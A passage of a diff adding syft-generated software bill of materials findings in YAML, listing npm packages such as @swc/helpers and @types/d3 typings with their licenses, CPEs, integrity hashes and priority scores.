@socket.io/component-emitter 3.1.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 32ce324a035d4e3a + name: '@socket.io/component-emitter' + version: 3.1.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@socket.io\/component-emitter:\@socket.io\/component-emitter:3.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@socket.io\/component-emitter:\@socket.io\/component_emitter:3.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@socket.io\/component_emitter:\@socket.io\/component-emitter:3.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@socket.io\/component_emitter:\@socket.io\/component_emitter:3.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@socket.io\/component:\@socket.io\/component-emitter:3.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@socket.io\/component:\@socket.io\/component_emitter:3.1.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40socket.io/component-emitter@3.1.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@socket.io/component-emitter/-/component-emitter-3.1.2.tgz + integrity: sha512-9BCxFwvbGg/RsZK9tjXd8s4UcwR0MWeFQ1XEKIQVVvAGJyINdrqKMcTRyLoK8Rse1GjzLV9cwjWV1olXRWEXVA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: de2edab9a58d26f1 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @swc/counter 0.1.3' + title: '@swc/counter 0.1.3' + description: 'Package discovered: @swc/counter 0.1.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: d1ab0047814562a3 + name: '@swc/counter' + version: 0.1.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@swc\/counter:\@swc\/counter:0.1.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40swc/counter@0.1.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@swc/counter/-/counter-0.1.3.tgz + integrity: sha512-e2BR4lsJkkRlKZ/qCHPw9ZaSxc0MVUd7gtbtaB7aMvHeJVYe8sOB8DBZkP2DtISHGSku9sCK6T6cnY0CtXrOCQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 6291224f1bf77e3f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @swc/helpers 0.5.21' + title: '@swc/helpers 0.5.21' + description: 'Package discovered: @swc/helpers 0.5.21' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f2d04f064acf1b61 + name: '@swc/helpers' + version: 0.5.21 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@swc\/helpers:\@swc\/helpers:0.5.21:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40swc/helpers@0.5.21 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.21.tgz + integrity: sha512-jI/VAmtdjB/RnI8GTnokyX7Ug8c+g+ffD6QRLa6XQewtnGyukKkKSk3wLTM3b5cjt1jNh9x0jfVlagdN2gDKQg== + dependencies: + tslib: ^2.8.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ec0bf772439a91e3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @swc/helpers 0.5.5' + title: '@swc/helpers 0.5.5' + description: 'Package discovered: @swc/helpers 0.5.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 72bc47189d44cca0 + name: '@swc/helpers' + version: 0.5.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@swc\/helpers:\@swc\/helpers:0.5.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40swc/helpers@0.5.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@swc/helpers/-/helpers-0.5.5.tgz + integrity: sha512-KGYxvIOXcceOAbEk4bi/dVLEK9z8sZ0uBB3Il5b1rhfClSpcX0yfRO0KmTkqR2cnQDymwLB+25ZyMzICg/cm/A== + dependencies: + '@swc/counter': ^0.1.3 + tslib: ^2.4.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 19698700a5d5ff08 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @tootallnate/once 2.0.0' + title: '@tootallnate/once 2.0.0' + description: 'Package discovered: @tootallnate/once 2.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: a7bdaefe075a54be + name: '@tootallnate/once' + version: 2.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@tootallnate\/once:\@tootallnate\/once:2.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40tootallnate/once@2.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@tootallnate/once/-/once-2.0.0.tgz + integrity: sha512-XCuKFP5PS55gnMVu3dty8KPatLqUoy/ZYzDzAGCQ8JNFCkLXzmI7vNHCR+XpbZaMWQK/vQubr7PkYq8g470J/A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 80bf92167036230d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @types/caseless 0.12.5' + title: '@types/caseless 0.12.5' + description: 'Package discovered: @types/caseless 0.12.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 7578f19b88adc968 + name: '@types/caseless' + version: 0.12.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@types\/caseless:\@types\/caseless:0.12.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40types/caseless@0.12.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@types/caseless/-/caseless-0.12.5.tgz + integrity: sha512-hWtVTC2q7hc7xZ/RLbxapMvDMgUnDvKvMOpKal4DrMyfGBUfB1oKaZlIRr6mJL+If3bAP6sV/QneGzF6tJjZDg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a5c07d1028c25891 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @types/cors 2.8.19' + title: '@types/cors 2.8.19' + description: 'Package discovered: @types/cors 2.8.19' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 8b6775e086bda391 + name: '@types/cors' + version: 2.8.19 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@types\/cors:\@types\/cors:2.8.19:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40types/cors@2.8.19 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@types/cors/-/cors-2.8.19.tgz + integrity: sha512-mFNylyeyqN93lfe/9CSxOGREz8cpzAhH+E93xJ4xWQf62V8sQ/24reV2nyzUWM6H6Xji+GGHpkbLe7pVoUEskg== + dependencies: + '@types/node': '*' + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d3e89ddbd967f67d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @types/d3-array 3.2.2' + title: '@types/d3-array 3.2.2' + description: 'Package discovered: @types/d3-array 3.2.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 59c0361f7de521dd + name: '@types/d3-array' + version: 3.2.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@types\/d3-array:\@types\/d3-array:3.2.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3-array:\@types\/d3_array:3.2.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3_array:\@types\/d3-array:3.2.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3_array:\@types\/d3_array:3.2.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-array:3.2.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_array:3.2.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40types/d3-array@3.2.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@types/d3-array/-/d3-array-3.2.2.tgz + integrity: sha512-hOLWVbm7uRza0BYXpIIW5pxfrKe0W+D5lrFiAEYR+pb6w3N2SwSMaJbXdUfSEv+dT4MfHBLtn5js0LAWaO6otw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4a5d6407d36c3dfe + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @types/d3-color 3.1.3' + title: '@types/d3-color 3.1.3' + description: 'Package discovered: @types/d3-color 3.1.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: ad88e8187765d8aa + name: '@types/d3-color' + version: 3.1.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@types\/d3-color:\@types\/d3-color:3.1.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3-color:\@types\/d3_color:3.1.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3_color:\@types\/d3-color:3.1.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3_color:\@types\/d3_color:3.1.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-color:3.1.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_color:3.1.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40types/d3-color@3.1.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@types/d3-color/-/d3-color-3.1.3.tgz + integrity: sha512-iO90scth9WAbmgv7ogoq57O9YpKmFBbmoEoCHDB2xMBY0+/KVrqAaCDyCE16dUspeOvIxFFRI+0sEtqDqy2b4A== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 075de1dd01220805 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @types/d3-ease 3.0.2' + title: '@types/d3-ease 3.0.2' + description: 'Package discovered: @types/d3-ease 3.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: df6234ea1d1790c8 + name: '@types/d3-ease' + version: 3.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@types\/d3-ease:\@types\/d3-ease:3.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3-ease:\@types\/d3_ease:3.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3_ease:\@types\/d3-ease:3.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3_ease:\@types\/d3_ease:3.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-ease:3.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_ease:3.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40types/d3-ease@3.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@types/d3-ease/-/d3-ease-3.0.2.tgz + integrity: sha512-NcV1JjO5oDzoK26oMzbILE6HW7uVXOHLQvHshBUW4UMdZGfiY6v5BeQwh9a9tCzv+CeefZQHJt5SRgK154RtiA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ac33d3528c07735d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @types/d3-interpolate 3.0.4' + title: '@types/d3-interpolate 3.0.4' + description: 'Package discovered: @types/d3-interpolate 3.0.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: d2cfc65d37d7fda7 + name: '@types/d3-interpolate' + version: 3.0.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@types\/d3-interpolate:\@types\/d3-interpolate:3.0.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3-interpolate:\@types\/d3_interpolate:3.0.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3_interpolate:\@types\/d3-interpolate:3.0.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3_interpolate:\@types\/d3_interpolate:3.0.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-interpolate:3.0.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_interpolate:3.0.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40types/d3-interpolate@3.0.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@types/d3-interpolate/-/d3-interpolate-3.0.4.tgz + integrity: sha512-mgLPETlrpVV1YRJIglr4Ez47g7Yxjl1lj7YKsiMCb27VJH9W8NVM6Bb9d8kkpG/uAQS5AmbA48q2IAolKKo1MA== + dependencies: + '@types/d3-color': '*' + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9ef37f1ec9a73980 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @types/d3-path 3.1.1' + title: '@types/d3-path 3.1.1' + description: 'Package discovered: @types/d3-path 3.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 0128eed2457b60d1 + name: '@types/d3-path' + version: 3.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@types\/d3-path:\@types\/d3-path:3.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3-path:\@types\/d3_path:3.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3_path:\@types\/d3-path:3.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3_path:\@types\/d3_path:3.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-path:3.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_path:3.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40types/d3-path@3.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@types/d3-path/-/d3-path-3.1.1.tgz + integrity: sha512-VMZBYyQvbGmWyWVea0EHs/BwLgxc+MKi1zLDCONksozI4YJMcTt8ZEuIR4Sb1MMTE8MMW49v0IwI5+b7RmfWlg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b363e223fe02334b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @types/d3-scale 4.0.9' + title: '@types/d3-scale 4.0.9' + description: 'Package discovered: @types/d3-scale 4.0.9' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 6f0b81bc9d69ce92 + name: '@types/d3-scale' + version: 4.0.9 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@types\/d3-scale:\@types\/d3-scale:4.0.9:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3-scale:\@types\/d3_scale:4.0.9:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3_scale:\@types\/d3-scale:4.0.9:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3_scale:\@types\/d3_scale:4.0.9:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-scale:4.0.9:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_scale:4.0.9:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40types/d3-scale@4.0.9 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@types/d3-scale/-/d3-scale-4.0.9.tgz + integrity: sha512-dLmtwB8zkAeO/juAMfnV+sItKjlsw2lKdZVVy6LRr0cBmegxSABiLEpGVmSJJ8O08i4+sGR6qQtb6WtuwJdvVw== + dependencies: + '@types/d3-time': '*' + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 22226a3e628ac76c + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @types/d3-shape 3.1.8' + title: '@types/d3-shape 3.1.8' + description: 'Package discovered: @types/d3-shape 3.1.8' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 533995aeaf2ae857 + name: '@types/d3-shape' + version: 3.1.8 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@types\/d3-shape:\@types\/d3-shape:3.1.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3-shape:\@types\/d3_shape:3.1.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3_shape:\@types\/d3-shape:3.1.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3_shape:\@types\/d3_shape:3.1.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-shape:3.1.8:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_shape:3.1.8:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40types/d3-shape@3.1.8 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@types/d3-shape/-/d3-shape-3.1.8.tgz + integrity: sha512-lae0iWfcDeR7qt7rA88BNiqdvPS5pFVPpo5OfjElwNaT2yyekbM0C9vK+yqBqEmHr6lDkRnYNoTBYlAgJa7a4w== + dependencies: + '@types/d3-path': '*' + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: e91025b60bc33c45 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @types/d3-time 3.0.4' + title: '@types/d3-time 3.0.4' + description: 'Package discovered: @types/d3-time 3.0.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: d051a01827d6eb95 + name: '@types/d3-time' + version: 3.0.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@types\/d3-time:\@types\/d3-time:3.0.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3-time:\@types\/d3_time:3.0.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3_time:\@types\/d3-time:3.0.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3_time:\@types\/d3_time:3.0.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3-time:3.0.4:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@types\/d3:\@types\/d3_time:3.0.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40types/d3-time@3.0.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@types/d3-time/-/d3-time-3.0.4.tgz + integrity: sha512-yuzZug1nkAAaBlBBikKZTgzCeA+k1uy4ZFwWANOfKw5z5LRhV0gNA7gNkKm7HoK+HRN0wX3EkxGk0fpbWhmB7g== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + 